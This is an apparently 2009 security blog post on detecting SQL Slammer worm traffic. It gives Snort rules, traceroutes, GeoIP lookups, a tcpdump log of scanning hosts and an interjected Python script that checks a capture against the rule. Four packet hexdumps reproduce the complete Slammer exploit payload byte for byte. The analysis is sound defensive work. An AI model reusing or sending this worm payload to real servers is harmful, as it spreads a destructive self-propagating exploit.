Tuesday, May 12, 2009

A Brief Anatomy of Malware detection and some notes on using traceroute and determining 'intent'

From the posts below we can begin to understand why signature identification is so important. We are looking for malware in the packet data itself, since any port can be used to send malware and any IP can be spoofed or can unwittingly be part of a botnet or worm. The packets below are indicative of the "Win32:SQLSlammer" worm attack, which has been around for a considerable time. The worm propagates itself by generating random IP addresses. Notice that the first SIP (Source IP) address is either spoofed or "router leakage": i.e. it comes from the RFC1918 "private" (non-Internet-routable) 10.0.0.0/8 block, 10.0.0.0 through 10.255.255.255. Remember that any of these IP addresses can be (a) spoofed, (b) botnet victims or (c) unpatched SQL servers, so their ultimate location does not necessarily tell us anything about 'intent' or 'bad actors'. Note the common signature in these 376-byte packets. "Win32:SQLSlammer" wreaked an extraordinary amount of havoc upon the Internet with a very small amount of assembly code. The current Snort rules for this worm look like this:

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"SQL Worm propagation attempt"; flow:to_server; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|"; content:"sock"; content:"send"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,5310; reference:bugtraq,5311; reference:cve,2002-0649; reference:nessus,11214; reference:url,vil.nai.com/vil/content/v_99992.htm; classtype:misc-attack; sid:2003; rev:12;)


alert udp $HOME_NET any -> $EXTERNAL_NET 1434 (msg:"SQL Worm propagation attempt OUTBOUND"; flow:to_server; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1|"; content:"sock"; content:"send"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,5310; reference:bugtraq,5311; reference:cve,2002-0649; reference:nessus,11214; reference:url,vil.nai.com/vil/content/v_99992.htm; classtype:misc-attack; sid:2004; rev:11;)


The packets I captured are below. Note the common ASCII signature.

05/11-14:33:07.744419 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
10.13.3.61:1092 -> 192.168.0.12:1434 UDP TTL:113 TOS:0x20 ID:61068 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 
0x0010: 01 94 EE 8C 00 00 71 11 8B AE 0A 0D 03 3D C0 A8  ......q......=..
0x0020: 00 0C 04 44 05 9A 01 80 63 09 04 01 01 01 01 01  ...D....c.......
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........<a...E..
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/11-14:53:48.630387 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
202.99.11.99:1231 -> 192.168.0.12:1434 UDP TTL:110 TOS:0x80 ID:26925 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 80  .`.0k...[.....E.
0x0010: 01 94 69 2D 00 00 6E 11 4B 31 CA 63 0B 63 C0 A8  ..i-..n.K1.c.c..
0x0020: 00 0C 04 CF 05 9A 01 80 9A 01 04 01 01 01 01 01  ................
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........<a...E..
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..

05/11-19:12:48.180440 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
58.20.222.30:1297 -> 192.168.0.12:1434 UDP TTL:114 TOS:0x20 ID:9759 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 
0x0010: 01 94 26 1F 00 00 72 11 48 33 3A 14 DE 1E C0 A8  ..&...r.H3:.....
0x0020: 00 0C 05 11 05 9A 01 80 57 53 04 01 01 01 01 01  ........WS......
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........<a...E..
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..

05/11-20:06:49.515800 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
69.13.200.210:1269 -> 192.168.0.12:1434 UDP TTL:115 TOS:0x20 ID:42723 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 
0x0010: 01 94 A6 E3 00 00 73 11 D0 C1 45 0D C8 D2 C0 A8  ......s...E.....
0x0020: 00 0C 04 F5 05 9A 01 80 61 C2 04 01 01 01 01 01  ........a.......
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........<a...E..
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..
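As an added example (my own code, not from the post or the Snort project), the following Python rebuilds the first dump above from Snort's hexdump text, decodes the Ethernet, IPv4 and UDP headers, and applies the port and content conditions of the sid:2003 rule to the 376-byte payload. It assumes the dump lines are pasted unchanged and, as Snort does when no distance/within modifiers are given, tests each content as an independent substring search rather than in sequence.

```python
"""Re-check the first Snort dump in this post against the port and content
conditions of the SQL Worm propagation rule (sid:2003)."""
import ipaddress
import re
import struct

# Frame copied from the first dump above (Ethernet + IPv4 + UDP, 418 bytes).
# Only the offset and hex columns are read; the ASCII column is ignored.
SNORT_HEXDUMP = """\
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E
0x0010: 01 94 EE 8C 00 00 71 11 8B AE 0A 0D 03 3D C0 A8  ......q......=..
0x0020: 00 0C 04 44 05 9A 01 80 63 09 04 01 01 01 01 01  ...D....c.......
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........<a...E..
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..
"""

HEX_LINE = re.compile(r"^0x([0-9A-Fa-f]{4}): (.*)$")


def parse_snort_hexdump(text):
    """Turn Snort's '0xOFFS: hh hh ...  ascii' lines back into bytes.

    The hex column ends at the first double space; the ASCII column is never
    tokenised because it can hold hex-looking pairs ("32" in "hel32hkern")."""
    out = bytearray()
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if not m:
            continue
        if int(m.group(1), 16) != len(out):
            raise ValueError("hexdump offsets are not contiguous")
        hexcol = m.group(2).split("  ", 1)[0]
        out += bytes.fromhex("".join(hexcol.split()))
    return bytes(out)


def decode_udp_frame(frame):
    """Minimal Ethernet/IPv4/UDP decoder: addresses, ports and payload."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 17:
        raise ValueError("not a UDP datagram")
    udp = ip[ihl:total_len]          # trust the IP length field, not the frame
    sport, dport, ulen = struct.unpack("!HHH", udp[:6])
    return {"src": str(ipaddress.ip_address(ip[12:16])),
            "dst": str(ipaddress.ip_address(ip[16:20])),
            "sport": sport, "dport": dport, "payload": udp[8:ulen]}


# Content matches from the sid:2003 rule text above.  Without a distance or
# within modifier Snort searches each content independently from the start of
# the payload, so presence is tested here, not order.
SQL_WORM_CONTENTS = (b"\x81\xF1\x03\x01\x04\x9B\x81\xF1\x01", b"sock", b"send")


def matches_sql_worm_rule(dport, payload):
    """Port 1434, first byte 0x04 (content:"|04|"; depth:1), then the rest."""
    if dport != 1434 or payload[:1] != b"\x04":
        return False
    return all(c in payload for c in SQL_WORM_CONTENTS)


def analyse(text):
    """Summarise one dump: who sent it, to which port, and whether the rule fires."""
    f = decode_udp_frame(parse_snort_hexdump(text))
    return {"src": f["src"], "dst": f["dst"], "dport": f["dport"],
            "payload_len": len(f["payload"]),
            "src_is_private": ipaddress.ip_address(f["src"]).is_private,
            "sql_worm": matches_sql_worm_rule(f["dport"], f["payload"])}


if __name__ == "__main__":
    for key, value in analyse(SNORT_HEXDUMP).items():
        print(f"{key:>15}: {value}")
```

Pasting any of the other three dumps into SNORT_HEXDUMP gives the same rule verdict with a different public source address, which is the "common signature" point the post makes.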


Notice that Snort gives us a full-length reading of the packet by default. This verbosity helps enable robust signature creation and detection. (More on that later.) Since the Win32:SQLSlammer worm propagates itself by generating "random IP addresses", the traceroutes below may simply lead back to more victims who have unpatched machines or who are botnet victims. Interestingly, several routers actually respond to my traceroute for the private IP address 10.13.3.61:

# traceroute 10.13.8.61
traceroute to 10.13.8.61 (10.13.8.61), 64 hops max, 40 byte packets
 1  192.168.0.1 (192.168.0.1)  0.405 ms  0.334 ms  0.286 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  11.558 ms  11.113 ms  12.196 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  10.639 ms  10.806 ms  15.992 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  13.841 ms  15.408 ms  15.311 ms
 6  * * *
 7  * * *
 8  * * *
 9  * * *
10  * * *

# traceroute 202.99.11.99
traceroute to 202.99.11.99 (202.99.11.99), 64 hops max, 40 byte packets
 1  192.168.0.1 (192.168.0.1)  0.496 ms  0.344 ms  0.376 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  11.941 ms  11.272 ms  15.845 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  24.681 ms  10.952 ms  11.595 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  14.363 ms  19.869 ms  14.247 ms
 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  13.914 ms  14.518 ms  14.792 ms
 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  19.672 ms  18.450 ms  19.496 ms
 8  pos-1-14-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.201)  32.156 ms  35.483 ms  31.574 ms
 9  pos-0-8-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.78)  33.493 ms  33.305 ms  34.754 ms
10  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.50)  37.252 ms  37.343 ms  37.79 ms
11  75.149.229.42 (75.149.229.42)  36.697 ms  40.34 ms  36.615 ms
12  219.158.29.221 (219.158.29.221)  241.962 ms  242.456 ms  242.522 ms
13  219.158.5.133 (219.158.5.133)  242.769 ms  243.188 ms  242.885 ms
14  219.158.4.57 (219.158.4.57)  249.602 ms  249.813 ms  249.892 ms
15  202.96.12.30 (202.96.12.30)  261.865 ms  261.656 ms  261.901 ms
16  61.148.156.9 (61.148.156.9)  267.504 ms  266.695 ms  266.543 ms
17  61.148.156.166 (61.148.156.166)  267.896 ms  267.840 ms  272.820 ms
18  202.96.13.138 (202.96.13.138)  273.190 ms  272.447 ms  272.802 ms
19  211.154.209.162 (211.154.209.162)  234.590 ms  239.304 ms  234.552 ms
20  202.96.6.74 (202.96.6.74)  263.857 ms  265.102 ms  263.489 ms
21  Sh-Rtr-2-S3/0.sta.net.cn (202.96.6.130)  246.632 ms  255.336 ms  245.572 ms
22  * * *

traceroute to 58.20.222.30 (58.20.222.30), 64 hops max, 60 byte packets
 1  192.168.0.1 (192.168.0.1)  0.352 ms  0.337 ms  0.288 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  8.935 ms  9.63 ms  9.107 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.516 ms  9.785 ms  9.715 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.484 ms  12.145 ms  11.947 ms
 6  pos-0-5-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.213)  14.90 ms  14.66 ms  12.611 ms
 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  17.41 ms  16.51 ms  18.15 ms
 8  pos-1-15-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.197)  29.443 ms  30.459 ms  29.458 ms
 9  pos-0-8-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.78)  31.863 ms  31.426 ms  31.794 ms
10  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.54)  35.808 ms  34.497 ms  35.363 ms
11  75.149.229.42 (75.149.229.42)  34.716 ms  64.27 ms  35.371 ms
12  219.158.29.213 (219.158.29.213)  247.202 ms  245.893 ms  247.260 ms
13  219.158.5.109 (219.158.5.109)  234.699 ms  234.229 ms  233.225 ms
14  219.158.9.102 (219.158.9.102)  239.58 ms  240.322 ms  240.992 ms
15  220.248.160.166 (220.248.160.166)  277.291 ms  275.978 ms  274.375 ms
16  58.20.222.30 (58.20.222.30)  245.299 ms  246.499 ms  245.847 ms

# traceroute -P ICMP 69.13.200.210                                     
traceroute to 69.13.200.210 (69.13.200.210), 64 hops max, 60 byte packets
 1  192.168.0.1 (192.168.0.1)  1.198 ms  1.158 ms  1.135 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  8.636 ms  11.743 ms  8.967 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.764 ms  8.822 ms  9.405 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.576 ms  12.828 ms  11.758 ms
 6  pos-0-5-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.213)  13.794 ms  12.422 ms  13.459 ms
 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  17.811 ms  16.782 ms  16.575 ms
 8  pos-1-14-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.201)  33.718 ms  28.898 ms  30.359 ms
 9  pos-0-9-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.181)  32.74 ms  32.334 ms  33.448 ms
10  er1-tengig3-4.sanjoseequinix.savvis.net (208.173.53.137)  35.790 ms  33.16 ms  32.538 ms
11  * cr1-tenge-0-3-5-0.sanfrancisco.savvis.net (204.70.200.198)  35.756 ms *
12  * * *
13  msr1-tengig0-0-0-0.dallas.savvis.net (204.70.196.202)  80.164 ms  81.798 ms  80.857 ms
14  er1-ge-3-0-6.dallas.savvis.net (204.70.202.61)  78.275 ms  75.309 ms  75.975 ms
15  federal-home-loan.Dallas.savvis.net (208.172.135.2)  76.970 ms  77.282 ms  77.882 ms
16  64.182.192.41 (64.182.192.41)  79.384 ms  79.456 ms  79.130 ms
17  210-200-13-69.cust.propagation.net (69.13.200.210)  76.181 ms  78.84 ms  77.538 ms

# geoiplookup 202.99.11.99 -f /usr/local/share/GeoIP/GeoLiteCity.dat
GeoIP City Edition, Rev 1: CN, 22, Beijing, (null), 39.928902, 116.388298, 0, 0
# geoiplookup 58.20.222.30 -f /usr/local/share/GeoIP/GeoLiteCity.dat 
GeoIP City Edition, Rev 1: CN, 11, Changsha, (null), 28.179199, 113.113602, 0, 0
# geoiplookup 69.13.200.210  -f /usr/local/share/GeoIP/GeoLiteCity.dat
GeoIP City Edition, Rev 1: US, TX, Fort Worth, 76112, 32.749199, -97.220497, 623, 817

Monday, May 11, 2009

Where are the SIPs from? Part II

The following sequence of commands and output gives us some idea of what a network security analyst's life was like before the development of Intrusion Prevention Systems. After a laboriously constructed tcpdump filter, we run this for 36 hours on our dummy/honeypot host. We then have a collection of SIPs sending packets to various ports. Some of these are easily identifiable, well-known attack ports (ms-sql, telnet, ssh, etc.).

/usr/local/sbin/tcpdump -s 0 -i xl0 -ttt -w out.txt  'port not(domain or whois or http or https or syslog or ntp or smtp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)' 

  
# tcpdump -r out.txt
tcpdump: WARNING: snaplen raised from 96 to 65535
21:07:30.303358 218.7.164.30.6000 > 192.168.0.12.ms-sql-s: S 69599232:69599232(0) win 16384 [tos 0x20]
21:30:08.976883 202.99.11.99.1231 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
22:20:11.329910 catv-86-101-50-119.catv.broadband.hu.1077 > 192.168.0.12.38507: udp 28 [tos 0x20]
23:01:48.360917 10.13.3.61.1092 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
23:40:09.452031 117.0.33.129.3285 > 192.168.0.12.telnet: S 543288824:543288824(0) win 5808 (DF) [tos 0x20]
00:36:06.236501 dynamic.91.192.169.55.vpcit.ru.1076 > 192.168.0.12.38507: udp 30 [tos 0x20]
00:46:25.553206 c-98-242-240-55.hsd1.fl.comcast.net.37443 > 192.168.0.12.ssh: S 3044387924:3044387924(0) win 5840 (DF) [tos 0x20]
01:17:34.032666 213.0.55.130.34982 > 192.168.0.12.38507: udp 31 [tos 0x20]
01:29:12.722357 94.123.212.150.13597 > 192.168.0.12.12712: udp 30 [tos 0x20]
02:17:27.658034 121.15.245.215.12200 > 192.168.0.12.3128: S 484387749:484387749(0) win 8192 (DF) [tos 0x20]
02:33:20.751286 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
02:33:21.387784 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
02:33:21.990932 118.222.228.38.4692 > 192.168.0.12.6429: S 1557396635:1557396635(0) win 65535 (DF) [tos 0x20]
02:58:36.094717 61.153.26.60.1517 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
03:12:16.084284 222.215.230.49.12200 > 192.168.0.12.8000: S 788992279:788992279(0) win 8192 (DF) [tos 0x20]
03:15:54.079656 222.215.230.49.12200 > 192.168.0.12.3128: S 796332311:796332311(0) win 8192 (DF) [tos 0x20]
03:19:51.292696 221.195.73.68.6000 > 192.168.0.12.7212: S 1454440448:1454440448(0) win 16384 [tos 0x20]
03:19:51.294608 221.195.73.68.6000 > 192.168.0.12.8000: S 798031872:798031872(0) win 16384 [tos 0x20]
04:36:18.268102 210.51.165.30.33386 > 192.168.0.12.ssh: S 1493736546:1493736546(0) win 5840 (DF) [tos 0x20]
05:38:50.224275 static-39-92-224-77.ipcom.comunitel.net.61031 > 192.168.0.12.12712: udp 94 [tos 0x20]
05:55:59.481908 75-165-69-40.tukw.qwest.net.4004 > 192.168.0.12.telnet: S 481811338:481811338(0) win 5840 (DF) [tos 0x20]
